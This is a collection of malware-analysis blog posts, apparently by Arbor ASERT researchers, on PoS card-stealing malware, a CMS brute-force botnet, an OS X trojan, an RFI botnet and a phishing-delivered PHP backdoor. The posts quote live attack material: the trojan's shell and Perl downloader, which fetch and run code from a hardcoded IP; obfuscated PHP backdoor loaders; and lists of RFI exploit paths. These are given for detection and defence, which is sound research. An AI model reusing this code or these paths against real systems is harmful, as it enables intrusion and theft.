Happy Holidays: Point of Sale Malware Campaigns Targeting Credit and Debit Cards

By: cwilson -

Inside Recent Point-of-Sale Malware Campaign Activities

Curt Wilson, Dave Loftus, Matt Bing

An active Point of Sale (PoS) compromise campaign designed to steal credit and debit card data using the Dexter and Project Hook malware has been detected. Indicators of compromise will be provided for mitigation and detection purposes. Prior to the publication of this Threat Intelligence document (embedded at the end of this post), members of the FS-ISAC, major Credit Card vendors and law enforcement were notified.

It appears that there are at least three distinct versions of Dexter:

  1. Stardust (looks to be an older version, perhaps version 1)
  2. Millenium (note spelling)
  3. Revelation (two observed malware samples; has the capability to use FTP to exfiltrate data)

In early November 2013, ASERT researchers discovered two servers hosting Dexter and other POS malware to include Project Hook.  The Dexter campaign looks more active, especially in the Eastern Hemisphere and therefore shall be the main focus herein. Dexter, first documented by Seculert in December 2012, is a Windows-based malware used to steal credit card data from PoS systems. The exact method of compromise is not currently known, however PoS systems suffer from the same security challenges that any other Windows-based deployment does. Network and host-based vulnerabilities (such as default or weak credentials accessible over Remote Desktop and open wireless networks that include a PoS machine), misuse, social engineering and physical access are likely candidates for infection. Additionally, potential brittleness and obvious criticality of PoS systems may be a factor in the reportedly slow patch deployment process on PoS machines, which increases risk. Smaller businesses are likely an easier target due to reduced security. While the attackers may receive less card data from smaller retailers, infections may be more numerous and last longer due to the lack of security reporting and security staff in such environments.

Figure 1: Dexter (Purple) and Project Hook (Orange) infections in the Eastern Hemisphere

Dexter and Project Hook infections in the eastern hemisphere

Figure 2: Dexter (Purple) and Project Hook (Orange) infections in the western hemisphere

Screen Shot 2013-12-03 at 1.22.00 AM

For the full document to include a list of various compromise indicators and information about the back-end infrastructure, please download the full public report -

Dexter and Project Hook Break the Bank

 

Fort Disco Bruteforce Campaign

By: Matthew Bing -

In recent months, several researchers have highlighted an uptick in bruteforce password guessing attacks targeting blogging and content management systems. Arbor ASERT has been tracking a campaign we are calling Fort Disco that began in late May 2013 and is continuing. We’ve identified six related command-and-control (C&C) sites that control a botnet of over 25,000 infected Windows machines. To date, over 6,000 Joomla, WordPress, and Datalife Engine installations have been the victims of password guessing.

Background

Understanding an attack campaign by only analyzing a malware executable file is a Sisyphean task. The malware alone can be picked apart by disassemblers, poked and prodded in a sandbox, but by itself offers no clues into the size, scope, motivation, and impact of the attack campaign. It’s much like a historian finding a discarded weapon on an ancient battlefield. Several things can be inferred, but painting a complete picture is difficult.

Researchers have several techniques at their disposal to gauge the size of a botnet. They can sinkhole discarded domains or monitor traffic to live attack sites to observe infected hosts checking in to a C&C site. In rare instances, the controller of a botnet may inadvertently leave clues publicly accessible for anyone to observe.

ftdisco

The controller of the campaign we call Fort Disco, named after one of the strings found in the PE metadata field, inadvertently left publicly accessible log files that lay out a complete picture of the campaign. There are six C&C sites that we believe are related. The sites either share a subdomain or are co-hosted with each other, and have similar structures.

Windows Malware

There are at least four variants of the Windows malware related to the Fort Disco campaign. A newly infected machine registers with the C&C site hardcoded into the malware:

> POST /cmd.php HTTP/1.0
>
> status=0

The malware then checks in to receive commands:

> GET /cmd.php HTTP/1.0
< 1
< 30
< http://[xxx]/10823.txt
< qazxsw
< 480

The command structure can vary, but the important commands are the third and fourth lines. The third line is a URL of a list of sites to attack. We’ve observed the target list being anywhere from 5,000 to 10,000 sites at a time. The C&C tends to give out the same list to multiple infections.

The fourth line is the password to use, and in some cases can be a URL to a password list. What’s particularly interesting about this bruteforce list is that it supports the dynamic values {domain} and {zone}. These values are replaced with the targets domain name and top-level zone, respectively. For instance, if the malware were targeting a blog at www.example.com and was configured to use “{domain}” as a password, the malware would attempt logging in with the password “example”. We’ve observed the password lists being used anywhere from 150 to 1,000 entries.

The malware has a URL of usernames hardcoded. The list is small, anywhere from one to five, and usually consists of “admin” or “administrator”. The login names also support {domain} values.

The malware will attempt to login to the target list with combinations of the supplied usernames and passwords. Successful username/password combinations are reported back to the C&C by posting to the file /bruteres.php. Results are appended to a text file publicly accessible via the web.

dir

It’s unclear exactly how the malware gets installed. We were able to find reference to the malware’s original filename (maykl_lyuis_bolshaya_igra_na_ponizhenie.exe) that referred to Michael Lewis’ book “The Big Short: Inside The Doomsday Machine” in Russian with an executable attachment. Another filename, proxycap_crack.exe, refers to a crack for the ProxyCap program. It’s unclear if victims were enticed to run these files, and if so, if that is the only means of infection. The C&C sites did not offer additional clues as to the infection mechanism.

cnc

 

Activity to the C&C sites continues. The above chart from Umbrella Security Graph’s passive DNS data show regular and continuing requests for this particular C&C domain name.

The log files found on the C&C sites included the IP addresses of victims. Some level of skepticism is required, since we are analyzing data that could have been altered by the attacker. We found 25,611 unique IP addresses connecting to the six C&C sites. Mitigating factors such as double-counting infections behind a NAT, and infected machines changing IP addresses may affect the final tally.

The top three countries with infections are the Philippines, Peru, and Mexico. Interestingly, it seems the United States and Western Europe are underrepresented. For an interactive map showing infected clients, click here.

Compromised Sites

Continuing to analyze the logs recovered from the C&C, we were able to compile a list of usernames and passwords for 6,127 sites.  Only three types of platforms were targeted: Joomla (/administrator/index.php), WordPress (/wp-login.php), and Datalife Engine (/admin.php).


blogs

The attacker chooses the sites to attack, which based on the top ten top-level domains where usernames and passwords are listed, appear to favor Russia:

Top-Level Domain Number
RU 2582
COM 1601
UA 348
NET 329
ORG 254
INFO 110
KZ 99
US 84
BY 76
xn--p1ai 65

The top ten passwords for these sites seem to indicate that these are targets of opportunity as these passwords are the “weakest of the weak”.

Password Number
admin 893
123456 588
123123 371
12345 360
{domain} 248
pass 218
123456789 171
1234 150
abc123 136
123321 131

 

With the compromised credentials, the commander of the botnet also installed a variant of the “FilesMan” PHP backdoor on to 788 of the sites. This password-protected backdoor allows the attacker to browse the filesystem, upload or download files, and execute commands.

The ultimate intent of the campaign remains unclear. On several compromised sites we found two tools:

• A simple PHP-based redirector that sends browsers running Windows with either “MSIE”, “Firefox”, or “Opera” in the User-Agent to a website through several more layers of redirection ultimately landing on a Styx exploit kit.
• A WordPress plugin and supporting library to import posts from a Tumblr blog.

We were not able to find any evidence that the tools were actually used, but based on their nature, we can speculate that the intent of the attacker is to serve exploit kits on these compromised sites.

Attribution

There are several clues that lead us to believe the owner is based in a post-Soviet state:

• The majority of the sites targeted are in Russia or the Ukraine.
• All of the C&C sites are hosted in Russia or the Ukraine.
• A Russian error string was found on several C&C sites. “Не могу подключиться к базе данных!”, which translates to “Unable to connect to database!”
• Although this appears to be the default, the character set of the FilesMan backdoor is set to “Windows-1251”, or the Cyrillic code page.
• The Datalife Engine platform appears to be popular in Russia.

Conclusion

Beginning with the Brobot attacks in early 2013, we’ve seen attackers focusing on targeting blogs and content management systems. This marks a tactical change in exploiting weak passwords and out-of-date software on popular platforms.  By uploading a PHP shell to compromised sites, an attacker can easily issue commands to thousands of compromised sites in seconds.

Blogs and CMSs tend to be hosted in data centers with immense network bandwidth. Compromising multiple sites gives the attacker access to their combined bandwidth, much more powerful than a similarly sized botnet of home computers with limited network access by comparison. While we have no evidence the Fort Disco campaign is related to Brobot or denial-of-service activity, we’ve experienced the threat that a large blog botnet can deliver.

Related MD5 Hashes

722a1809bd4fd75743083f3577e1e6a4
750708867e9ff30c6b706b7f86eb67b5
976f77d6546eb641950ef49a943449f1
062dae6ee87999552eae4bb37cdec5d4
7931709fd9b84bbb1775afa2f9dff13a
9b8b185ce66b6887cc19149258ba1d1b

Arbor Networks at Virus Bulletin 2011

By: jedwards -

Arbor’s ASERT team has a paper at this year’s Virus Bulletin conference in Barcelona, Spain. The paper, by Arbor’s Jeff Edwards and Jose Nazario, is titled A survey of Chinese DDoS malware and is based on some of the detailed analysis we did as part of the development of the ATLAS intelligence feed or AIF. Our malware stream contains a lot of DDoS bots, many from China, one of the more interesting ecosystems of malware development.

The abstract follows:

This paper surveys the diverse landscape of Trojan horse families populating a specific niche in the overall malware ecosystem: botnets that primarily serve as Distributed Denial of Service (DDoS) attack agents and which are believed to be of Chinese origin and/or to be primarily controlled from Chinese IP space.

Approximately two dozen distinct malware families will be described and documented, including the Rincux, NetBot Attacker, IMDDOS, Darkshell and YoyoDDoS families. These families will be characterized in terms of their command and control (CnC) protocols, DDoS attack capabilities, general code architecture, organization of their CnC infrastructure, and preferred targets.

Findings regarding the evolution and sharing/cross-pollination of malcode, as well as the build/release frequency of new versions will be presented. An approximate taxonomy of this particular space of malware will be proposed. The bulk malware analysis infrastructure that was used to obtain these findings will also be briefly described.

The paper is quite in-depth and contains a lot of technical details not covered in the talk, so be sure to refer to the paper if the talk is at all interesting.

Malicious Google AppEngine Used as a CnC

By: Jose -

Over the weekend our zoo found a malware sample that revealed a malicious Google AppEngine application. The app in question is being used to feed URLs to the zombies for them to download. We got the malware via sample sharing, and its original location and infection information is absent. The malware details are below:

MD5: 2143a7b9a9de6ea26987ed8ece29d2c6
SHA1: 30f6befc76e4e269e5aa9c01c735d55d7ca4099a
File type: application/x-ms-dos-executable
File size: 65024 bytes

It’s a simple HTTP engine and downloader, packed with UPX. The C&C is visible in the unpacked sample:

http://xiaoiboxip.appspot.com/[OMITTED]?hostname=

&&systemcpoy=
&&userName=

Where [Omitted] refers to a four letter explicative (this is a family friendly blog, folks!).

This was bound to happen, after all, in an open environment like this where people’s abilities are limited by their intentions. The C&C appears to manage infections on the basis of the computer hostname sent in the request; a unique hostname yields the malcode URL to update:

<br>http://XX.XX.76.85/aa.exe</br>

In this case aa.exe is a PCClient backdoor to the infected PCs. When you come back, at this time you just get the word “cmd”. It’s unclear to be what additional commands the C&C can issue to clients.

A quick analysis of the original malware doesn’t reveal any additional functionality, just the downloader bits. (See below) Google’s been contacted for the AppEngine to be taken down, and the site hosting the second stage malware has been contacted for takedown, as well.

UPDATE Google has confirmed the malicious AppEngine is now down.

UPDATE 2 Actually, looking at the sample reveals that it talks to a host in China using what at first blush appears to be a Grey Pigeon protocol.

UPDATE 3 Found another URL the app used, but i’m not sure what it was used for:

http://xiaoiboxip.appspot.com/getip?speed=100


The google cache of the results suggest it reads something like “Today visited 42 times this month, visited 587 times.” It’s unclear if that’s the size of the botnet or what.

Things in 3FN

By: Jose -

I think by this time folks know about the FTC action against 3FN (Triple Fiber Network). Here’s some of the stuff we had tracked there over the years.

3fn_activity_timeline.png

Don’t expect spam to drop to record lows any time soon, but … well done by the FTC.

New OS X Malcode: Not Just a DNSChanger

By: Jose -

Seems that Apple’s OS X has been taking a minor beating in the malcode front lately, as noted in the blog post New Trojans Strike OS X from CA. I got a copy of it last night and had a look, I wanted to see what the OS X malcode community was up to. The answer is both nothing much (it’s like we stepped back to 1999) and some new stuff (new approaches not yet seen in the OS X world, but old hat on Windows).

I became aware of the malcode through this URL shared in a ShadowServer link report:

http://online-channels.net/[REMOVED]/spam.txt

which yields the message “LOL look what the kid does to himself >> http://online-channels.net/[REMOVED]/random/1696/0/ :P :| !”, which will get spammed out in some message layer. About that hostname and IP, it’s located in the Netherlands (abuse contact has been made, we’ll see about takedown). It’s User-agent aware and delivers a Mac executable for folks on OS X and a Windows EXE for other folks.

online-channels.net A INET 89.248.172.213
AS      | IP               | AS Name
29073   | 89.248.172.213   | ECATEL-AS AS29073, Ecatel Network

If you visit the website you see something like this that leads to a “install this codec” response.

Jahlav_A_download.png

I’m sure you can see why I was suspicious: running this on an OS X system produces a fake Windows XP dialogue box. So I downloaded it and had a look. It’s an OS X DMG file named “cold-live7000.dmg”.

MD5(eaac894f299d15e75f48d99e4d9b254f)  cold-live7000.dmg

The OS X version of this file has very poor AV detection according to VirusTotal. The Windows EXE (MD5 = 042d747ac1494035fa4e26845aebfddc) has 7/32 detected in VirusTotal, using names like “TR/DNSChanger.hkx”, “Win32:FaDrop”, “TrojanDropper:Win32/Alureon.gen!B”, “a variant of Win32/Kryptik.BT”, and “Mal/BadNSIS”. It contacts a different host:

AS      | IP               | AS Name
29073   | 94.102.60.56     | ECATEL-AS AS29073, Ecatel Network

Right next door to the OS X server (see below).

When you mount it under OS X you get a volume named “install.pkg”. For those of you not used to OS X, install.pkg is a typical name for an installer (.pkg is common in OS X). Nothing too up-and-up yet! Let’s start digging in:

o:/Volumes/install.pkg/install.pkg/Contents jose$ ls -lrt
total 96
drwxr-xr-x   8 jose  jose    272 Nov 15 12:35 Resources
-rw-r--r--   1 jose  jose      9 Nov 15 12:35 PkgInfo
-rw-r--r--   1 jose  jose   3277 Nov 15 12:35 Archive.pax.gz
-rw-r--r--   1 jose  jose  35617 Nov 15 12:35 Archive.bom
-rw-r--r--   1 jose  jose   1329 Nov 15 12:35 Info.plist

So far this looks … well, interesting. Let’s first dig into the Resources subdirectory, that usually has the very intriguing bits:

o:/Volumes/install.pkg/install.pkg/Contents/Resources jose$ ls -lrt
total 48
-rwxr-xr-x   1 jose  jose  8027 Oct 28 10:43 License
-rwxr-xr-x   1 jose  jose  2189 Nov 15 12:35 preupgrade
-rwxr-xr-x   1 jose  jose  2189 Nov 15 12:35 preinstall
-rw-r--r--   1 jose  jose    17 Nov 15 12:35 package_version
drwxr-xr-x   3 jose  jose   102 Nov 15 12:35 en.lproj
-rw-r--r--   1 jose  jose   545 Nov 15 12:35 BundleVersions.plist

The files “preupgrade” and “preinstall” do not differ, they’re shell scripts:

o:/Volumes/install.pkg/install.pkg/Contents/Resources jose$ less
preinstall
#!/bin/sh
if [ $# != 1 ]; then type=0; else type=1; fi && tail -35 $0 | uudecode -o
/dev/stdout | sed 's/applemac/AdobeFlash/' | sed 's/bsd/7000/' | sed
's/gnu/'$type'/' >`uname -p` && sh `uname -p` && rm `uname -p` && exit
begin 777 withlove
M159)3#TB87!P;&5M86,B"G!A=&@](B],:6)R87)Y+TEN=&5R;F5T(%!L=6&ES=#U@8W)O;G1A8B`M;'QG

(Truncated) If we UUdecode that block (withlove) we get another script:

o:/Volumes/inspkg/install.pkg/Contents/Resources jose$ uudecode -o
/dev/stdout /tmp/withlove.uue
EVIL="applemac"
path="/Library/Internet Plug-Ins"
exist=`crontab -l|grep $EVIL`
if [ "$exist" == "" ]; then
     echo/5 * * * "$path/$EVIL" 1>/dev/null 2>&1" > cron.inst
     crontab cron.inst
     rm cron.inst
fi
#
tail -21 $0 | uudecode -o /d7777/bsd/' | sed 's/typeofrun/gnu/' | perl &&
exit
begin 666 jah
M(R$O=7-R+V)7)L"G5S92!)3SHZ4V]C:V5T.PIM>2`D:7`](CDT+C$P
M,BXV,"XQ,#8B+"1A;G-W97(](B(["FUY("1R=6YT>7!E/71Y<&5O9G);CL*
M"G-U8B!T<@/2!S:&EF=#L*"21S=')I;F<@
M/7X@<

(Truncated again) The first part of that will install a crontab entry (scheduled job) to look for new malcode (as the installed user) every five minutes via the script it's about to install. The UUencoded archive "jah" is a Perl script:

:/Volumes/install.pkg/install.pkg/Contents/Resources jose$ cat
/tmp/jah.uue | uudecode -v/stdout | sed 's/7777/7000/' | sed
's/typeofrun//'
#!/usr/bin/perl
usmy $ip="94.102.60.106",$answer="";
my $runtype=;
#
sub trim($)
{
         my $string = shift;
         $string =~ s/r//;
         $s =~ s/n//;
         return $string;
}
#
my $socket=IO::Socket::INET->new(PeerAddr=>"$ip",PeerPort=>"8roto=>"tcp")
or return;
print $socket "Gtor.pl HTTP/1.0rnUser-Agent: ".trim(`uname
-p`).";$runtype;".trim(`hostname`).";rnrn";
#
while(<$socket>){ $answer.=$_;}
close($socket);
#
my $data=substr($wer,index($answer,"rnrn")+4);
if($answer=~/Time: (.*)rn/)
{
     my $cpos=0,@pos=split(/ /,$1);foreach(@pos)
     {
         my $file="/tmp/".$_;
		 #
         open(FILE,">".$file);
         print FILE sr($data,$cpos,$_);
         close(FILE);
		 #
         chmod 0755, $file;
         system($file);
		 #
         os+=$_;
     }
}

And with this your box is downloading various malcode, they know what you're running, and further exploits are possible.

Earlier today the malcode phoned home to this HTTP server in AS29073 in the Netherlands:

AS29073   | 94.12.60.106    | ECATEL-AS AS29073, Ecatel Network

Now that same server has moved to the UK:

AS4589    | 94.12.60.106     | EASYNET Easynet Group Plc

It's no longer responding for me, it's possible that Easynet took care of it.

UPDATE
I've been editing this post for the past hour or so adding new details as they come in. In addition to the single Windows sample I posted above, a handful more related samples have shown up in our database in the past week:

2008-11-24      KuLightCadecPock3373.exe
2008-11-24      http://xxxlexelink.com/[REMOVED]/pathexe.php?id=3373&na...
2008-11-23      http://cold-live.net/[REMOVED]/Xvid.Codec.Upda...
2008-11-22      http://mamasplanet.com/[REMOVED]/samplevideo.php
2008-11-21      6c9d833b1914341e9facea439ef7...
2008-11-20      keygen_Malware_Defender_1_0_1_3552.exe
2008-11-19      http://www.beautypornpost.com/[REMOVED]/movie...
2008-11-18      http://www.babespornmovies.com/[REMOVED]/fr...
2008-11-18      http://tasty-moms.com/[REMOVED]/video.php
2008-11-18      http://bitchysexymoms.com/[REMOVED]/mov.php

These samples connect to 94.102.60.56, but one of them connects to 78.157.142.108, located in UltraNet:

AS      | IP               | AS Name
35057   | 78.157.142.108   | ULTRANET-AS UltraNet Ltd.

That ISP is appearantly in Latvia (.lv) … The Windows EXEs also POST to a script on the web server to announce their infections and get new binaries.

What’s even more interesting is the degree of investment this team has made in OS X malcode. They’ll be making new infections, it seems, for some time to come with that configurable loader.

Inside an RFI Botnet

By: Jose -

It all began innocently enough; I have been analyzing Apache logs for a while now, and when I spotted an RFI bot that was named “ddos.txt”, you know I had to look. After downloading it and analyzing it, I joined the channel with a copy of Bladerunner and started watching. The net’s been pretty quiet but here’s a few messages that came across, lately:

Tue Nov 11 00:11:14 2008
 @scan index.php?rage= index.php?rage=
...
Thu Nov 13 07:12:37 2008
 !scan /encapscms_PATH/core/core.php?root= "encapscms 0.3.6" "encapscms 0.3.6"
Thu Nov 13 07:12:37 2008
 !scan /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path= "com_thopper"
Thu Nov 13 07:12:37 2008
 !scan /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path= "com_pccookbook"
Thu Nov 13 07:12:37 2008
 !scan /admin/business_inc/saveserver.php?thisdir= "saveserver.php"
Thu Nov 13 07:12:37 2008
 !scan /admin/classes/TplLoad.php?full_path_to_public_program= "TplLoad.php"
Thu Nov 13 07:12:37 2008
 !scan /PhpLinkExchange/bits_listings.php?svr_rootP= /PhpLinkExchange/
Thu Nov 13 07:12:37 2008
 !scan /PNphpBB2/includes/functions_admin.php?phpbb_root_path= /PNphpBB2/
Thu Nov 13 07:12:40 2008
 !scan /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path= "com_mambowiki"
Thu Nov 13 07:12:41 2008
 !scan /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path= "com_mambots"
Thu Nov 13 07:12:43 2008
 !scan /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path= "com_mambatstaff"
...
Fri Nov 14 12:27:15 2008  4,12Ciao a tutti
Fri Nov 14 12:27:17 2008  4,12Arrivederci alla prox
...
Mon Nov 17 16:35:05 2008  hello
Mon Nov 17 18:54:45 2008  hello

Looks like Italian language hackers simply growing a botnet. No DDoS attacks launched, so far.

The channel topic instructs members (aka bots) to download three files. The first is one we’ll call “dork”. It’s basically a config file for an RFI scanner in Perl that takes a massive file (over 4300 scan commands) to spread the botnet. There’s simply no shortage of RFI vulnerabilities out there in various projects.

!scan /tellmatic/include/libchart-1.1/libchart.php?tm_includepath= "Tellmatic 1.0.7.1" "Tellmatic 1.0.7.1"
!scan esupport/admin/autoclose.php?subd= "Powered By Kayako eSupport" "Powered By Kayako eSupport"
!scan /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path= "PHP-NUKE" asia "PHP-NUKE" asia
!scan /index.php?skin_file= "powered by Mp3 ToolBox 1.0 beta 5" "powered by Mp3 ToolBox 1.0 beta 5"
!scan /skin/zero_vote/ask_password.php?dir= "zeroboard" cz "zeroboard" cz
!scan /config.inc.php?path_escape= "XZero"
!scan mambots/content/multithumb/multithumb.php?mosConfig_absolute_path= "/mambots/content/" de "/mambots/content/" de
!scan ?mosConfig_absolute_path= "Joomla! is Free Software released under the GNU/GPL License"
!scan /tools/send_reminders.php?noSet=0&includedir= WebCalendar
!scan phprojekt/lib/lib.inc.php?path_pre= /phprojekt/
!scan phprojekt/lib/lib.inc.php?path_pre= copyright ?2000-2005 Albrecht Guenther
...

The second two URLs point to c57 and c99 PHP shells.

These all work with a Perl script which we’ll call “dork.pl”. Basically it works as such:

  • Use search engines to find vulnerable system: Google, AllTheWeb, GigaBlast, AOL, Yahoo, MSN, ASK, FireBall
  • Try and exploit the box:
    • First try a PHP ID script; if that works move on and mail the author that it worked
    • Next try and load a PHP shell on the box; if that works, mail and move on to the next step
    • Now try and get the first stage “spreader” on the box; again, mail and move on if successful
    • Finally try and get the second stage “spreader” on the box, mail if successful
  • Once the box is exploited, all of the scripts are on the box: a PHP bot, a Perl bot (which is also an IRC bot, DDoS tool, and exploier), and PHP shells.

Quite the sloppy set up, very much slapped together. The code could use a good refactoring, as well, it has a lot of cut and paste going on. Crude but effective.

Once the PHP bot, in this case “ddos.txt”, drops and executes via the RFI exploit, it will drop another Perl script on the box, this one is a connect back door. It has the payload Base64 encoded in the PHP, so it simply opens a file in /tmp and drops it in there.

In this case, the bots connect to IndoIRC and maybe irc.irchighway.net; Neither network is terribly well known for its security practices and seem to tolerate or welcome botnet activities.

The great proliferation of RFI attacks, and the ease with which they can be tested and exploited with “frameworks” such as “dork.pl” should give you great pause. We often see Phishing sites set up on these boxes, and sometimes other nefarious activities hosted there, as well. When folks have hundreds of vulnerabilities and thousands of boxes to easily test them again, they’ll strike it rich quickly. Death by a thousand cuts, and now you can see how it happens.

“Baiting” Web Surfers

By: Sunil James -

In case you haven’t already heard, a variety of websites, including those with content about “fish and tackle,” have been identified as having been compromised so that when people browser to the site, they’re then re-directed to an alternate location, where the host is then compromised so that attackers could then steal potentially sensitive data, and employ the host itself to launch future attacks.

Fish and tackle….wow.

What I find particularly interesting about this is not the technical aspects of how exploitation occurs, but rather the measured approach employed by one or more individuals to execute such an attack. As with any product acquisition, the first step is for the buyer to identify a set of vendors with the desired product. In this case, the attacker acquired an exploitation framework that employed rigorous software engineering processes and was distributed and marketed in a fashion similar to mainstream software. By that, I mean that the framework purveyor(s) developed marketing collateral, offered tiered product and service pricing, and offered one year of support. From there, the attacker folded the tool into the pre-built network of compromised hosts and waited for users to be compromised; all the while being provided with up-to-date statistics about who was being exploited, what country they were based in, and what exploits were most effective.

Rather than employ web servers hosting illegitimate content, the attackers employed primarily Italian web servers hosting fairly benign content, including: tourism, hotels, automotive, movies and music. August in Italy is notorious for effectively being one long holiday. That makes these web servers are ideal targets, as a multitude of vacationers (not just Italian or other Europeans) are visiting these sites and seeking information about how to spend the holiday.

This methodical approach is consistent with an unnerving trend of attackers employing re-usable systems for future financial gain (see Danny’s “Botconomics” post to learn all about this). In the short-term, the attackers will likely employ the stolen financial information to build a larger network of compromised hosts. The attackers themselves can subsequently utilize that network, or they can seek some sort of “ROI” by “leasing” out the network to other attackers. Either way, this case further emphasizes the importance of security vendors and service providers doing as much as possible to provide Internet users with as safe a browsing experience as possible. While hosts should certainly be patched as quickly as possible, network security vendors (like us) are working with service providers who own the “pipes,” thereby allowing us to attack this problem from a different, hopefully more successful, perspective.

AV, how cam’st thou in this pickle?

By: Danny McPherson -

While I’ve seen and heard random spatterings about why AV isn’t effective, or analyst reports from the likes of Yankee declaring “AV is Dead”, there’s been very little qualitative or quantitative study on precisely why. Well, beyond the endless flurry of new malware families and subseqent offspring, that is.. As such, I find myself borrowing from Shakespeare’s The Tempest, and asking: “AV: how cam’st thou in the pickle?”

That’s why I’m pleased some of my colleagues at Arbor, with some co-collaborators at the University of Michigan, published Automated Classification and Analysis of Internet Malware (pdf).

There are basically three main issues with AV in the report:

    • completeness – AV does not provide a complete categorization of the datasets, with AV failing to provide labels for 20 to 62 percent of the malware samples examined in the study
    • consistency – when labels are provided, malware is inconsistently classified across families and variants within a single naming convention, as well as across multiple vendors and conventions
    • conciseness – AV systems provide either too little or far too much information about a specific piece of malware

The authors go on to demonstrate how what something does is more important then what you call it (i.e., behaviors are better than labels). By observing state changes associated with files modified, processes created and network connections, a behavioral fingerprint can be generated for the malware. From there, grouping based on these fingeprints can provide some meaningful output and actionable information.

It’s definitely worth the read…

PHP/WebGuard (and ASP/WebGuard) Attacks

By: Jose -

Last week I got three separate emails about an attack that people were seeing, blending phishing, a Trojan, a backdoor, and a website hack all in one. The whole thing relies on the target user falling prey to the “phish”. In this case, they’re not after someone’s bank account, they’re after their participation in a website hack. I didn’t write this up last week due to time constraints, and now this is receiving wider attention.

The Trojan/phish emails look innocent enough:

Dear COLO COMPANY valued Members

Regarding our new security regulations, as a part of our yearly maintenance we have provided a security guard script in the attachment.

So, to secure your websites, please use the attached file and (for UNIX/Linux Based servers) upload the file “guard.php” in: “./public_html” or (for Windows Based servers which use ASP) upload the file “guard.asp” in: “./wwwroot” in your site.

If you do not know how to use it, you can use the following instruction:

For Unix/Linux based websites that use PHP/CGI/PERL:
1) Download the attachment named “guard.zip”
2) Extract file “guard.php”
3) Login to your site Control panel.
4) Open “File Manager” window.
5) Go through “Public_html” or “htdocs”
6) Choose “Upload Files”
7) Upload the file “guard.php”
8) Check its URL too “http://www.yoursite.com/guard.php”, if it is ok

For Windows based websites that use ASP:
1) Download the attachment named “guard.zip”
2) Extract file “guard.asp”
3) Login to your site Control panel.
4) Open “File Manager” window.
5) Go through “wwwroot” directory
6) Choose “Upload Files”
7) Upload the file “guard.asp”
8) Check its URL too “http://www.yoursite.com/guard.asp”, if it is ok

Thank you for using our services and products. We look forward to providing you with a unique and high quality service.

Best Regards

COLO COMPANY

COLO COMPANY is just dumped in there to fool you and is replaced by the organization you’re with. I’ve seen several high profile company’s customers targeted with this. The email contains an attachment named ‘guard.zip’, which extracts with two files (which they told you about in the email):

Archive:  guard.zip
Length     Date   Time    Name
--------    ----   ----    ----
161024  02-07-07 18:27   guard.asp
129732  02-08-07 02:15   guard.php
--------                   -------
290756                   2 files

These are just website server script files, and they’re plain text you can examine. The scripts themselves have a variable integer in them, and every copy of this I’ve seen has had a different integer. This means that static detection via MD5s is the files or email attachments will not work. The Snort sig (see below) takes this into account. If you take the time to look at the PHP you’ll see this:

$OOO0O0O00=__FILE__;$O00O00O00=__LINE__;$OO00O0000=155620;eval((base64_decode(base64_decode('SkU4d01E
QlBNRTh3TUQxbWIzQmxiaWdrVDA5UE1FOHdUekF3TENkeVlpY3BPM2RvYVd4bEtDMHRKRTh3TUU4d01FOHdNQ2xtWjJWMGN5Z2tUe
kF3TUU4d1R6QXdMREV3TWpRcE8yWm5aWFJ6S0NSUE1EQXdUekJQTURBc05EQTVOaWs3SkU5UE1EQlBNREJQTUQwb1ltRnpaVFkwWD
JSbFkyOWtaU2h6ZEhKMGNpaG1jbVZoWkNna1R6QXdNRTh3VHpBd0xETTNNaWtzSnpFeU16UTFOamM0T1RCQllVSmlRMk5FWkVWbFJ
tWkhaMGhvU1dsS2FrdHJUR3hOYlU1dVQyOVFjRkZ4VW5KVGMxUjBWWFZXZGxkM1dIaFplVnA2S3k4OUp5d25RVUpEUkVWR1IwaEpT
a3RNVFU1UFVGRlNVMVJWVmxkWVdWcGhZbU5rWldabmFHbHFhMnh0Ym05d2NYSnpkSFYyZDNoNWVqQXhNak0wTlRZM09Ea3JMeWNwS
1NrN1pYWmhiQ2drVDA4d01FOHdNRTh3S1RzPQ=='))));return;?>
...

Not overtly bad, but obviously not good. This is doubly encoded PHP at this point: base64 encoded and encoded with a private decoder that looks like this:

$O000O0O00=fopen($OOO0O0O00,'rb');while(--$O00O00O00)fgets($O000O0O00,1024);fgets($O000O0O00,4096);
$OO00O00O0=(base64_decode(strtr(fread($O000O0O00,372),'1234567890AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRr
SsTtUuVvWwXxYyZz+/=','ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/')));
eval($OO00O00O0);

After a couple of rounds of decoding you see that it will spit out some JavaScript and do two things on the server. First, it will send an email to the recipient:

To: firstbts@gmail.com
Subject: Darwin Ocho.local 7.9.0 Darwin Kernel Version 7.9.0: Wed Mar 30 20:11:17 PST 2005; root:xnu/xnu-517.12.7.obj~1/RELEASE_PPC Power Macintosh powerpc
From: L4M3r

Note that this email address is dead. (That subject line is just “uname -a”.) Secondly, it will try and backdoor your box on port 4500. But it will also spit out some HTML to the web clients that looks a bit like this:

[script language="JavaScript" type="text/javascript"]
document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%
6A%61%76%61%73%63%72%69%70%7...

JavaScript, our old friend, and doubly encoded to boot (escaped and encoded, which in turn is decoded by a function dF() written to the browser in JavaScript). After decoding it, you’ll see (what your browser sees, ultimately) a page entitled “Enterprise Threat Protection” and an IFRAME that points to ht tp://westerncapitalfx.com/[REMOVE]images/php/index.php (URL deliberately obfuscated). When I looked last week it wasn’t live, and it doesn’t seem live now.All in all a not so sophisticated attack, but one that’s making the rounds. This has hit a few high profile hosting centers, so beware. The box you may be sharing with someone could be botted. Detecting this isn’t so hard, I helped Matt Jonkman develop Snort sigs for it. If you’re a webmaster, look for emails to that destination address. And if you’re looking for infected hosts, check port 4500 listeners. I believe some AV companies have added detection for this, too. Updated to add: I looked again, no one has any specific AV detection for this threat. AVG does detect a PHP backdoor, but this detection appears to be non-specific.

I finally did the writeup to save some people some time and to quit shuttling around private emails. I don’t know how widespread this is by this point.

Go Back In Time →